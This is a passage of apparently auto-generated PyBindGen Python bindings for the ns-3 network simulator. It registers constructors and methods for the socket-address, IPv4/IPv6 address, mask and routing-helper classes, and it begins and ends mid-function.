    ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Hasher const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Hasher const &', 'arg0')])
    ## hash.h (module 'core'): ns3::Hasher::Hasher() [constructor]
    cls.add_constructor([])
    ## hash.h (module 'core'): ns3::Hasher::Hasher(ns3::Ptr<ns3::Hash::Implementation> hp) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::Hash::Implementation >', 'hp')])
    ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(char const * buffer, size_t const size) [member function]
    cls.add_method('GetHash32',
                   'uint32_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')])
    ## hash.h (module 'core'): uint32_t ns3::Hasher::GetHash32(std::string const s) [member function]
    cls.add_method('GetHash32',
                   'uint32_t',
                   [param('std::string const', 's')])
    ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(char const * buffer, size_t const size) [member function]
    cls.add_method('GetHash64',
                   'uint64_t',
                   [param('char const *', 'buffer'), param('size_t const', 'size')])
    ## hash.h (module 'core'): uint64_t ns3::Hasher::GetHash64(std::string const s) [member function]
    cls.add_method('GetHash64',
                   'uint64_t',
                   [param('std::string const', 's')])
    ## hash.h (module 'core'): ns3::Hasher & ns3::Hasher::clear() [member function]
    cls.add_method('clear',
                   'ns3::Hasher &',
                   [])
    return
def register_Ns3Inet6SocketAddress_methods(root_module, cls):
    """Register ns3::Inet6SocketAddress bindings on *cls*.

    Covers the constructor overloads (Ipv6Address or C-string, with or
    without a port), the static ConvertFrom/IsMatchingType helpers, and the
    port/address getters and setters.
    """
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Inet6SocketAddress const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Inet6SocketAddress const &', 'arg0')])
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6, uint16_t port) [constructor]
    cls.add_constructor([param('ns3::Ipv6Address', 'ipv6'), param('uint16_t', 'port')])
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6) [constructor]
    cls.add_constructor([param('ns3::Ipv6Address', 'ipv6')])
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(uint16_t port) [constructor]
    cls.add_constructor([param('uint16_t', 'port')])
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6, uint16_t port) [constructor]
    cls.add_constructor([param('char const *', 'ipv6'), param('uint16_t', 'port')])
    ## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6) [constructor]
    cls.add_constructor([param('char const *', 'ipv6')])
    ## inet6-socket-address.h (module 'network'): static ns3::Inet6SocketAddress ns3::Inet6SocketAddress::ConvertFrom(ns3::Address const & addr) [member function]
    cls.add_method('ConvertFrom',
                   'ns3::Inet6SocketAddress',
                   [param('ns3::Address const &', 'addr')],
                   is_static=True)
    ## inet6-socket-address.h (module 'network'): ns3::Ipv6Address ns3::Inet6SocketAddress::GetIpv6() const [member function]
    cls.add_method('GetIpv6',
                   'ns3::Ipv6Address',
                   [],
                   is_const=True)
    ## inet6-socket-address.h (module 'network'): uint16_t ns3::Inet6SocketAddress::GetPort() const [member function]
    cls.add_method('GetPort',
                   'uint16_t',
                   [],
                   is_const=True)
    ## inet6-socket-address.h (module 'network'): static bool ns3::Inet6SocketAddress::IsMatchingType(ns3::Address const & addr) [member function]
    cls.add_method('IsMatchingType',
                   'bool',
                   [param('ns3::Address const &', 'addr')],
                   is_static=True)
    ## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetIpv6(ns3::Ipv6Address ipv6) [member function]
    cls.add_method('SetIpv6',
                   'void',
                   [param('ns3::Ipv6Address', 'ipv6')])
    ## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetPort(uint16_t port) [member function]
    cls.add_method('SetPort',
                   'void',
                   [param('uint16_t', 'port')])
    return
def register_Ns3InetSocketAddress_methods(root_module, cls):
    """Register ns3::InetSocketAddress bindings on *cls*.

    IPv4 counterpart of register_Ns3Inet6SocketAddress_methods: constructor
    overloads, static ConvertFrom/IsMatchingType, and address/port accessors.
    """
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::InetSocketAddress const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::InetSocketAddress const &', 'arg0')])
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4, uint16_t port) [constructor]
    cls.add_constructor([param('ns3::Ipv4Address', 'ipv4'), param('uint16_t', 'port')])
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4) [constructor]
    cls.add_constructor([param('ns3::Ipv4Address', 'ipv4')])
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(uint16_t port) [constructor]
    cls.add_constructor([param('uint16_t', 'port')])
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4, uint16_t port) [constructor]
    cls.add_constructor([param('char const *', 'ipv4'), param('uint16_t', 'port')])
    ## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4) [constructor]
    cls.add_constructor([param('char const *', 'ipv4')])
    ## inet-socket-address.h (module 'network'): static ns3::InetSocketAddress ns3::InetSocketAddress::ConvertFrom(ns3::Address const & address) [member function]
    cls.add_method('ConvertFrom',
                   'ns3::InetSocketAddress',
                   [param('ns3::Address const &', 'address')],
                   is_static=True)
    ## inet-socket-address.h (module 'network'): ns3::Ipv4Address ns3::InetSocketAddress::GetIpv4() const [member function]
    cls.add_method('GetIpv4',
                   'ns3::Ipv4Address',
                   [],
                   is_const=True)
    ## inet-socket-address.h (module 'network'): uint16_t ns3::InetSocketAddress::GetPort() const [member function]
    cls.add_method('GetPort',
                   'uint16_t',
                   [],
                   is_const=True)
    ## inet-socket-address.h (module 'network'): static bool ns3::InetSocketAddress::IsMatchingType(ns3::Address const & address) [member function]
    cls.add_method('IsMatchingType',
                   'bool',
                   [param('ns3::Address const &', 'address')],
                   is_static=True)
    ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetIpv4(ns3::Ipv4Address address) [member function]
    cls.add_method('SetIpv4',
                   'void',
                   [param('ns3::Ipv4Address', 'address')])
    ## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetPort(uint16_t port) [member function]
    cls.add_method('SetPort',
                   'void',
                   [param('uint16_t', 'port')])
    return
def register_Ns3IntToType__0_methods(root_module, cls):
    """Register the ns3::IntToType<0> template instantiation (default and copy ctor only) on *cls*."""
    ## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType() [constructor]
    cls.add_constructor([])
    ## int-to-type.h (module 'core'): ns3::IntToType<0>::IntToType(ns3::IntToType<0> const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IntToType< 0 > const &', 'arg0')])
    return
def register_Ns3IntToType__1_methods(root_module, cls):
    """Register the ns3::IntToType<1> template instantiation (default and copy ctor only) on *cls*."""
    ## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType() [constructor]
    cls.add_constructor([])
    ## int-to-type.h (module 'core'): ns3::IntToType<1>::IntToType(ns3::IntToType<1> const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IntToType< 1 > const &', 'arg0')])
    return
def register_Ns3IntToType__2_methods(root_module, cls):
    """Register the ns3::IntToType<2> template instantiation (default and copy ctor only) on *cls*."""
    ## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType() [constructor]
    cls.add_constructor([])
    ## int-to-type.h (module 'core'): ns3::IntToType<2>::IntToType(ns3::IntToType<2> const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IntToType< 2 > const &', 'arg0')])
    return
def register_Ns3IntToType__3_methods(root_module, cls):
    """Register the ns3::IntToType<3> template instantiation (default and copy ctor only) on *cls*."""
    ## int-to-type.h (module 'core'): ns3::IntToType<3>::IntToType() [constructor]
    cls.add_constructor([])
    ## int-to-type.h (module 'core'): ns3::IntToType<3>::IntToType(ns3::IntToType<3> const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IntToType< 3 > const &', 'arg0')])
    return
def register_Ns3IntToType__4_methods(root_module, cls):
    """Register the ns3::IntToType<4> template instantiation (default and copy ctor only) on *cls*."""
    ## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType() [constructor]
    cls.add_constructor([])
    ## int-to-type.h (module 'core'): ns3::IntToType<4>::IntToType(ns3::IntToType<4> const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IntToType< 4 > const &', 'arg0')])
    return
def register_Ns3IntToType__5_methods(root_module, cls):
    """Register the ns3::IntToType<5> template instantiation (default and copy ctor only) on *cls*."""
    ## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType() [constructor]
    cls.add_constructor([])
    ## int-to-type.h (module 'core'): ns3::IntToType<5>::IntToType(ns3::IntToType<5> const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IntToType< 5 > const &', 'arg0')])
    return
def register_Ns3IntToType__6_methods(root_module, cls):
    """Register the ns3::IntToType<6> template instantiation (default and copy ctor only) on *cls*."""
    ## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType() [constructor]
    cls.add_constructor([])
    ## int-to-type.h (module 'core'): ns3::IntToType<6>::IntToType(ns3::IntToType<6> const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IntToType< 6 > const &', 'arg0')])
    return
def register_Ns3Ipv4Address_methods(root_module, cls):
    """Register ns3::Ipv4Address bindings on *cls*.

    Registers comparison/output-stream operators first, then constructors,
    static factory/query helpers (GetAny, GetBroadcast, ...), const
    predicates (IsBroadcast, IsMulticast, ...), serialization, and the two
    Set overloads (uint32_t and dotted-quad C-string).
    """
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor]
    cls.add_constructor([])
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor]
    cls.add_constructor([param('uint32_t', 'address')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor]
    cls.add_constructor([param('char const *', 'address')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function]
    cls.add_method('CombineMask',
                   'ns3::Ipv4Address',
                   [param('ns3::Ipv4Mask const &', 'mask')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function]
    cls.add_method('ConvertFrom',
                   'ns3::Ipv4Address',
                   [param('ns3::Address const &', 'address')],
                   is_static=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function]
    cls.add_method('Deserialize',
                   'ns3::Ipv4Address',
                   [param('uint8_t const *', 'buf')],
                   is_static=True)
    ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function]
    cls.add_method('Get',
                   'uint32_t',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function]
    cls.add_method('GetAny',
                   'ns3::Ipv4Address',
                   [],
                   is_static=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function]
    cls.add_method('GetBroadcast',
                   'ns3::Ipv4Address',
                   [],
                   is_static=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function]
    cls.add_method('GetLoopback',
                   'ns3::Ipv4Address',
                   [],
                   is_static=True)
    ## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
    cls.add_method('GetSubnetDirectedBroadcast',
                   'ns3::Ipv4Address',
                   [param('ns3::Ipv4Mask const &', 'mask')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function]
    cls.add_method('GetZero',
                   'ns3::Ipv4Address',
                   [],
                   is_static=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function]
    cls.add_method('IsBroadcast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function]
    cls.add_method('IsEqual',
                   'bool',
                   [param('ns3::Ipv4Address const &', 'other')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function]
    cls.add_method('IsLocalMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function]
    cls.add_method('IsMatchingType',
                   'bool',
                   [param('ns3::Address const &', 'address')],
                   is_static=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function]
    cls.add_method('IsMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
    cls.add_method('IsSubnetDirectedBroadcast',
                   'bool',
                   [param('ns3::Ipv4Mask const &', 'mask')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('uint8_t *', 'buf')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function]
    cls.add_method('Set',
                   'void',
                   [param('uint32_t', 'address')])
    ## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function]
    cls.add_method('Set',
                   'void',
                   [param('char const *', 'address')])
    return
def register_Ns3Ipv4InterfaceAddress_methods(root_module, cls):
    """Register ns3::Ipv4InterfaceAddress bindings on *cls*.

    Registers equality/output-stream operators, constructors, and getter/
    setter pairs for local address, mask, broadcast, scope, and the
    primary/secondary flag.
    """
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress() [constructor]
    cls.add_constructor([])
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4Address local, ns3::Ipv4Mask mask) [constructor]
    cls.add_constructor([param('ns3::Ipv4Address', 'local'), param('ns3::Ipv4Mask', 'mask')])
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::Ipv4InterfaceAddress(ns3::Ipv4InterfaceAddress const & o) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4InterfaceAddress const &', 'o')])
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetBroadcast() const [member function]
    cls.add_method('GetBroadcast',
                   'ns3::Ipv4Address',
                   [],
                   is_const=True)
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4InterfaceAddress::GetLocal() const [member function]
    cls.add_method('GetLocal',
                   'ns3::Ipv4Address',
                   [],
                   is_const=True)
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4Mask ns3::Ipv4InterfaceAddress::GetMask() const [member function]
    cls.add_method('GetMask',
                   'ns3::Ipv4Mask',
                   [],
                   is_const=True)
    ## ipv4-interface-address.h (module 'internet'): ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e ns3::Ipv4InterfaceAddress::GetScope() const [member function]
    cls.add_method('GetScope',
                   'ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e',
                   [],
                   is_const=True)
    ## ipv4-interface-address.h (module 'internet'): bool ns3::Ipv4InterfaceAddress::IsSecondary() const [member function]
    cls.add_method('IsSecondary',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetBroadcast(ns3::Ipv4Address broadcast) [member function]
    cls.add_method('SetBroadcast',
                   'void',
                   [param('ns3::Ipv4Address', 'broadcast')])
    ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetLocal(ns3::Ipv4Address local) [member function]
    cls.add_method('SetLocal',
                   'void',
                   [param('ns3::Ipv4Address', 'local')])
    ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetMask(ns3::Ipv4Mask mask) [member function]
    cls.add_method('SetMask',
                   'void',
                   [param('ns3::Ipv4Mask', 'mask')])
    ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetPrimary() [member function]
    cls.add_method('SetPrimary',
                   'void',
                   [])
    ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetScope(ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
    cls.add_method('SetScope',
                   'void',
                   [param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')])
    ## ipv4-interface-address.h (module 'internet'): void ns3::Ipv4InterfaceAddress::SetSecondary() [member function]
    cls.add_method('SetSecondary',
                   'void',
                   [])
    return
def register_Ns3Ipv4Mask_methods(root_module, cls):
    """Register ns3::Ipv4Mask bindings on *cls*.

    Registers equality/output-stream operators, constructors (raw uint32_t
    or dotted-quad C-string), static factories (GetLoopback/GetOnes/GetZero),
    and the Get/Set/IsMatch query methods.
    """
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor]
    cls.add_constructor([])
    ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor]
    cls.add_constructor([param('uint32_t', 'mask')])
    ## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor]
    cls.add_constructor([param('char const *', 'mask')])
    ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function]
    cls.add_method('Get',
                   'uint32_t',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function]
    cls.add_method('GetInverse',
                   'uint32_t',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function]
    cls.add_method('GetLoopback',
                   'ns3::Ipv4Mask',
                   [],
                   is_static=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function]
    cls.add_method('GetOnes',
                   'ns3::Ipv4Mask',
                   [],
                   is_static=True)
    ## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function]
    cls.add_method('GetPrefixLength',
                   'uint16_t',
                   [],
                   is_const=True)
    ## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function]
    cls.add_method('GetZero',
                   'ns3::Ipv4Mask',
                   [],
                   is_static=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function]
    cls.add_method('IsEqual',
                   'bool',
                   [param('ns3::Ipv4Mask', 'other')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function]
    cls.add_method('IsMatch',
                   'bool',
                   [param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True)
    ## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function]
    cls.add_method('Set',
                   'void',
                   [param('uint32_t', 'mask')])
    return
def register_Ns3Ipv4RoutingHelper_methods(root_module, cls):
    """Register ns3::Ipv4RoutingHelper bindings on *cls*.

    Copy() and Create() are registered as pure-virtual const methods
    (abstract in C++); the PrintRoutingTable* helpers are plain const
    member functions.
    """
    ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper::Ipv4RoutingHelper() [constructor]
    cls.add_constructor([])
    ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper::Ipv4RoutingHelper(ns3::Ipv4RoutingHelper const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4RoutingHelper const &', 'arg0')])
    ## ipv4-routing-helper.h (module 'internet'): ns3::Ipv4RoutingHelper * ns3::Ipv4RoutingHelper::Copy() const [member function]
    cls.add_method('Copy',
                   'ns3::Ipv4RoutingHelper *',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4-routing-helper.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4RoutingHelper::Create(ns3::Ptr<ns3::Node> node) const [member function]
    cls.add_method('Create',
                   'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
                   [param('ns3::Ptr< ns3::Node >', 'node')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableAllAt(ns3::Time printTime, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
    cls.add_method('PrintRoutingTableAllAt',
                   'void',
                   [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_const=True)
    ## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableAllEvery(ns3::Time printInterval, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
    cls.add_method('PrintRoutingTableAllEvery',
                   'void',
                   [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_const=True)
    ## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableAt(ns3::Time printTime, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
    cls.add_method('PrintRoutingTableAt',
                   'void',
                   [param('ns3::Time', 'printTime'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_const=True)
    ## ipv4-routing-helper.h (module 'internet'): void ns3::Ipv4RoutingHelper::PrintRoutingTableEvery(ns3::Time printInterval, ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
    cls.add_method('PrintRoutingTableEvery',
                   'void',
                   [param('ns3::Time', 'printInterval'), param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
                   is_const=True)
    return
def register_Ns3Ipv6Address_methods(root_module, cls):
    """Register Python bindings for ns3::Ipv6Address on *cls*.

    Each ``##`` comment quotes the C++ declaration (from ipv6-address.h,
    module 'network') that the registration call immediately below it
    binds.  NOTE(review): this file appears to be machine generated
    (PyBindGen style) -- lasting changes belong in the generator input,
    not here.
    """
    # Comparison and output-stream operators.
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor]
    cls.add_constructor([])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor]
    cls.add_constructor([param('char const *', 'address')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor]
    cls.add_constructor([param('uint8_t *', 'address')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor]
    cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function]
    cls.add_method('CombinePrefix',
                   'ns3::Ipv6Address',
                   [param('ns3::Ipv6Prefix const &', 'prefix')])
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function]
    cls.add_method('ConvertFrom',
                   'ns3::Ipv6Address',
                   [param('ns3::Address const &', 'address')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function]
    cls.add_method('Deserialize',
                   'ns3::Ipv6Address',
                   [param('uint8_t const *', 'buf')],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function]
    cls.add_method('GetAllHostsMulticast',
                   'ns3::Ipv6Address',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function]
    cls.add_method('GetAllNodesMulticast',
                   'ns3::Ipv6Address',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function]
    cls.add_method('GetAllRoutersMulticast',
                   'ns3::Ipv6Address',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function]
    cls.add_method('GetAny',
                   'ns3::Ipv6Address',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function]
    cls.add_method('GetBytes',
                   'void',
                   [param('uint8_t *', 'buf')],
                   is_const=True)
    ## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function]
    cls.add_method('GetIpv4MappedAddress',
                   'ns3::Ipv4Address',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function]
    cls.add_method('GetLoopback',
                   'ns3::Ipv6Address',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function]
    cls.add_method('GetOnes',
                   'ns3::Ipv6Address',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function]
    cls.add_method('GetZero',
                   'ns3::Ipv6Address',
                   [],
                   is_static=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function]
    cls.add_method('IsAllHostsMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function]
    cls.add_method('IsAllNodesMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function]
    cls.add_method('IsAllRoutersMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function]
    cls.add_method('IsAny',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsDocumentation() const [member function]
    cls.add_method('IsDocumentation',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function]
    cls.add_method('IsEqual',
                   'bool',
                   [param('ns3::Ipv6Address const &', 'other')],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() [member function]
    # NOTE: non-const in the C++ declaration above, hence no is_const here.
    cls.add_method('IsIpv4MappedAddress',
                   'bool',
                   [])
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function]
    cls.add_method('IsLinkLocal',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function]
    cls.add_method('IsLinkLocalMulticast',
                   'bool',
                   [],
                   is_const=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function]
    cls.add_method('IsLocalhost',
                   'bool',
